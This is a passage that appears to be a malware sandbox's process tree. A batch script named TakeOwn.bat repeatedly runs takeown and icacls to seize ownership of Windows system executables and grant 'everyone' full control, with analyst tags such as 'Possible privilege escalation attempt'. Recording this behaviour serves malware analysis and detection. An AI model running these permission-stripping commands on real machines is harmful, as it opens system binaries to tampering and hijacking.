C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_ddb5359fa07e69e6\doskey.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_ddb5359fa07e69e6\doskey.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_ddb5359fa07e69e6\doskey.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_ddb5359fa07e69e6\print.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_ddb5359fa07e69e6\print.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_ddb5359fa07e69e6\print.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_ddb5359fa07e69e6\subst.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_ddb5359fa07e69e6\subst.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-m..ommandlineutilities_31bf3856ad364e35_10.0.22000.1_none_ddb5359fa07e69e6\subst.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-m..player-shellpreview_31bf3856ad364e35_10.0.22000.1_none_21361b29ac61361b\wmprph.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-m..player-shellpreview_31bf3856ad364e35_10.0.22000.1_none_21361b29ac61361b\wmprph.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-m..player-shellpreview_31bf3856ad364e35_10.0.22000.1_none_21361b29ac61361b\wmprph.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-magnify_31bf3856ad364e35_10.0.22000.1_none_cec61f64d1d9b52e\Magnify.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-magnify_31bf3856ad364e35_10.0.22000.1_none_cec61f64d1d9b52e\Magnify.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-magnify_31bf3856ad364e35_10.0.22000.1_none_cec61f64d1d9b52e\Magnify.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-makecab_31bf3856ad364e35_10.0.22000.1_none_5167c9dea268ae49\makecab.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-makecab_31bf3856ad364e35_10.0.22000.1_none_5167c9dea268ae49\makecab.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-makecab_31bf3856ad364e35_10.0.22000.1_none_5167c9dea268ae49\makecab.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mapi-mmga_31bf3856ad364e35_10.0.22000.1_none_36e30e5c0bb5efc5\mmgaserver.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mapi-mmga_31bf3856ad364e35_10.0.22000.1_none_36e30e5c0bb5efc5\mmgaserver.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mapi-mmga_31bf3856ad364e35_10.0.22000.1_none_36e30e5c0bb5efc5\mmgaserver.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_b1071c7fd34df0e8\f\fixmapi.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_b1071c7fd34df0e8\f\fixmapi.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_b1071c7fd34df0e8\f\fixmapi.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_b1071c7fd34df0e8\fixmapi.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_b1071c7fd34df0e8\fixmapi.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_b1071c7fd34df0e8\fixmapi.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_b1071c7fd34df0e8\r\fixmapi.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_b1071c7fd34df0e8\r\fixmapi.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mapi_31bf3856ad364e35_10.0.22000.120_none_b1071c7fd34df0e8\r\fixmapi.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_a2190a6cc64fec46\f\mfpmp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_a2190a6cc64fec46\f\mfpmp.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_a2190a6cc64fec46\f\mfpmp.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_a2190a6cc64fec46\mfpmp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_a2190a6cc64fec46\mfpmp.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_a2190a6cc64fec46\mfpmp.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_a2190a6cc64fec46\r\mfpmp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_a2190a6cc64fec46\r\mfpmp.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediafoundation_31bf3856ad364e35_10.0.22000.120_none_a2190a6cc64fec46\r\mfpmp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-autoplay_31bf3856ad364e35_10.0.22000.1_none_7b92f89679249548\wmlaunch.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-autoplay_31bf3856ad364e35_10.0.22000.1_none_7b92f89679249548\wmlaunch.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-autoplay_31bf3856ad364e35_10.0.22000.1_none_7b92f89679249548\wmlaunch.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmpconfig.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmpconfig.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmpconfig.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmplayer.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmplayer.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmplayer.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmpshare.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmpshare.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\f\wmpshare.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\r\wmpconfig.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\r\wmpconfig.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\r\wmpconfig.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\r\wmplayer.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\r\wmplayer.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\r\wmplayer.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\r\wmpshare.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\r\wmpshare.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\r\wmpshare.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\wmpconfig.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\wmpconfig.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\wmpconfig.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\wmplayer.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\wmplayer.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\wmplayer.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\wmpshare.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\wmpshare.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.22000.282_none_10e4c14208d6d2d3\wmpshare.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-logagent_31bf3856ad364e35_10.0.22000.1_none_4bd8d42ffb32ad8a\logagent.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-logagent_31bf3856ad364e35_10.0.22000.1_none_4bd8d42ffb32ad8a\logagent.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-logagent_31bf3856ad364e35_10.0.22000.1_none_4bd8d42ffb32ad8a\logagent.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-setup_31bf3856ad364e35_10.0.22000.1_none_0e8c117a0fb4af58\setup_wm.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-setup_31bf3856ad364e35_10.0.22000.1_none_0e8c117a0fb4af58\setup_wm.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-setup_31bf3856ad364e35_10.0.22000.1_none_0e8c117a0fb4af58\setup_wm.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-setup_31bf3856ad364e35_10.0.22000.1_none_0e8c117a0fb4af58\unregmp2.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-setup_31bf3856ad364e35_10.0.22000.1_none_0e8c117a0fb4af58\unregmp2.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-setup_31bf3856ad364e35_10.0.22000.1_none_0e8c117a0fb4af58\unregmp2.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mobsyncexe_31bf3856ad364e35_10.0.22000.1_none_4fe921868d7ef368\mobsync.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mobsyncexe_31bf3856ad364e35_10.0.22000.1_none_4fe921868d7ef368\mobsync.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mobsyncexe_31bf3856ad364e35_10.0.22000.1_none_4fe921868d7ef368\mobsync.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-mountvol_31bf3856ad364e35_10.0.22000.1_none_12f1c1658a9d216d\mountvol.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-mountvol_31bf3856ad364e35_10.0.22000.1_none_12f1c1658a9d216d\mountvol.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-mountvol_31bf3856ad364e35_10.0.22000.1_none_12f1c1658a9d216d\mountvol.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-msaudittools_31bf3856ad364e35_10.0.22000.1_none_781d59aef5ebc75f\auditpol.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-msaudittools_31bf3856ad364e35_10.0.22000.1_none_781d59aef5ebc75f\auditpol.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-msaudittools_31bf3856ad364e35_10.0.22000.1_none_781d59aef5ebc75f\auditpol.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-msdt_31bf3856ad364e35_10.0.22000.1_none_061aa9eb56b04ee9\msdt.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-msdt_31bf3856ad364e35_10.0.22000.1_none_061aa9eb56b04ee9\msdt.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-msdt_31bf3856ad364e35_10.0.22000.1_none_061aa9eb56b04ee9\msdt.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_72d931253b133480\f\msinfo32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_72d931253b133480\f\msinfo32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_72d931253b133480\f\msinfo32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_72d931253b133480\msinfo32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_72d931253b133480\msinfo32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_72d931253b133480\msinfo32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_72d931253b133480\r\msinfo32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_72d931253b133480\r\msinfo32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe-common_31bf3856ad364e35_10.0.22000.71_none_72d931253b133480\r\msinfo32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_987098e149e09f68\f\msinfo32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_987098e149e09f68\f\msinfo32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_987098e149e09f68\f\msinfo32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_987098e149e09f68\msinfo32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_987098e149e09f68\msinfo32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_987098e149e09f68\msinfo32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_987098e149e09f68\r\msinfo32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_987098e149e09f68\r\msinfo32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-msinfo32-exe_31bf3856ad364e35_10.0.22000.71_none_987098e149e09f68\r\msinfo32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-muicachebuilder_31bf3856ad364e35_10.0.22000.1_none_7aa4e433ee022a53\mcbuilder.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-muicachebuilder_31bf3856ad364e35_10.0.22000.1_none_7aa4e433ee022a53\mcbuilder.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-muicachebuilder_31bf3856ad364e35_10.0.22000.1_none_7aa4e433ee022a53\mcbuilder.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-n..kgroundtransferhost_31bf3856ad364e35_10.0.22000.1_none_ef1ce2dee8e9f117\BackgroundTransferHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-n..kgroundtransferhost_31bf3856ad364e35_10.0.22000.1_none_ef1ce2dee8e9f117\BackgroundTransferHost.exe"3⤵
-
-
